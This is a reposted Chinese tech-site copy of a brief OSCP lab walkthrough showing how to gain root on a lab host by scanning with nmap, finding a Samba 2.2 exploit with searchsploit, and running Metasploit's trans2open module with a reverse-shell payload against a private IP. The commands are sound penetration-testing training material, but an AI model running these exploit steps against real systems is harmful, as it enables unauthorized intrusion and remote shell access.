首页 > Web开发 > 详细

OSCP Security Technology - Gaining Root with Metasploit

时间:2021-07-07 10:18:02      阅读:29      评论:0      收藏:0      [点我收藏+]

OSCP Security Technology - Gaining Root with Metasploit

Analysis nmap scanning result.

技术分享图片

searchsploit samba 2.2 

技术分享图片

msfconsole
search trans2open
use exploit/linux/samba/trans2open
show options

技术分享图片

set rhost 192.168.2.28
show targets
exploit

技术分享图片

We need change the payload setting.

show options
set payload generic/shell_reverse_tcp
exploit

技术分享图片

技术分享图片

OSCP Security Technology - Gaining Root with Metasploit

原文:https://www.cnblogs.com/keepmoving1113/p/14979824.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!